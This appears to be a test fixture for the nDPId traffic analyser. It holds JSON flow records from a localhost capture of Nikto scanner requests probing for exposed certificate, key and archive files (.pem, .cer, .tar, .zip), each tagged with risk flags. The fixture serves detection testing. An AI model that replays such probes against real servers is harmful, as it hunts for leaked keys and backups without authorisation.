-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":132,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276873,"flow_last_seen":1576420276873,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49808,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1576420276873,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276873,"pkt":"AAAAAAAAAAAAAAAACABFAADFhm9AAEAGtcF\/AAABfwAAAcKQH5BNzL4wefiP1IAYAED+uQAAAQEICp1m+7GdZvuxR0VUIC8xMjcuMC4wLjEuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276873,"flow_last_seen":1576420276873,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49808,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":133,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276874,"flow_last_seen":1576420276874,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49810,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1576420276874,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276874,"pkt":"AAAAAAAAAAAAAAAACABFAADCE1BAAEAGKOR\/AAABfwAAAcKSH5DnJisNBZiCk4AYAED+tgAAAQEICp1m+7KdZvuyR0VUIC8xMjcwMDEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276874,"flow_last_seen":1576420276874,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49810,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":134,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276876,"flow_last_seen":1576420276876,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276876,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49812,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1576420276876,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276876,"pkt":"AAAAAAAAAAAAAAAACABFAADCnWxAAEAGnsd\/AAABfwAAAcKUH5Co\/aUqs\/1iGoAYAED+tgAAAQEICp1m+7SdZvu0R0VUIC8xMjcwMDEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":134,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276876,"flow_last_seen":1576420276876,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276876,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49812,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276877,"flow_last_seen":1576420276877,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49814,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1576420276877,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276877,"pkt":"AAAAAAAAAAAAAAAACABFAADAt7lAAEAGhHx\/AAABfwAAAcKWH5CQPI\/1lm3rwoAYAED+tAAAAQEICp1m+7WdZvu1R0VUIC9zaXRlLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276877,"flow_last_seen":1576420276877,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49814,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276879,"flow_last_seen":1576420276879,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276879,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49816,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1576420276879,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276879,"pkt":"AAAAAAAAAAAAAAAACABFAADAhf9AAEAGtjZ\/AAABfwAAAcKYH5Cnmb2\/tsRlFIAYAED+tAAAAQEICp1m+7edZvu2R0VUIC9zaXRlLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276879,"flow_last_seen":1576420276879,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276879,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49816,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276881,"flow_last_seen":1576420276881,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276881,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49818,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1576420276881,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276881,"pkt":"AAAAAAAAAAAAAAAACABFAADADYtAAEAGLqt\/AAABfwAAAcKaH5CHzTXOE9kNb4AYAED+tAAAAQEICp1m+7mdZvu5R0VUIC8xMjcwLnRhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276881,"flow_last_seen":1576420276881,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276881,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49818,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":138,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276884,"flow_last_seen":1576420276884,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276884,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49820,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1576420276884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276884,"pkt":"AAAAAAAAAAAAAAAACABFAADAT5pAAEAG7Jt\/AAABfwAAAcKcH5DBOXfeD5T\/lYAYAED+tAAAAQEICp1m+7udZvu7R0VUIC8xMjcwLnRhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":138,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276884,"flow_last_seen":1576420276884,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276884,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49820,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276885,"flow_last_seen":1576420276885,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49822,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1576420276885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276885,"pkt":"AAAAAAAAAAAAAAAACABFAADFQQ5AAEAG+yJ\/AAABfwAAAcKeH5AdhXlKg0oevYAYAED+uQAAAQEICp1m+72dZvu9R0VUIC8xMjcuMC4wLjEuYWx6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276885,"flow_last_seen":1576420276885,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49822,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276886,"flow_last_seen":1576420276886,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276886,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49824,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1576420276886,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276886,"pkt":"AAAAAAAAAAAAAAAACABFAADFWJBAAEAG46B\/AAABfwAAAcKgH5CSJ2DMWYYFgIAYAED+uQAAAQEICp1m+76dZvu+R0VUIC8xMjcuMC4wLjEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276886,"flow_last_seen":1576420276886,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276886,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49824,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":141,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276888,"flow_last_seen":1576420276888,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276888,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49826,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1576420276888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276888,"pkt":"AAAAAAAAAAAAAAAACABFAAC95a1AAEAGVot\/AAABfwAAAcKiH5DfWN3u+DsBkYAYAED+sQAAAQEICp1m+8CdZvvAR0VUIC8wLnppcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276888,"flow_last_seen":1576420276888,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276888,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49826,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276890,"flow_last_seen":1576420276890,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49828,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1576420276890,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276890,"pkt":"AAAAAAAAAAAAAAAACABFAAC9vy5AAEAGfQp\/AAABfwAAAcKkH5Dme4drk\/tL44AYAED+sQAAAQEICp1m+8KdZvvCR0VUIC8wLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276890,"flow_last_seen":1576420276890,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49828,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 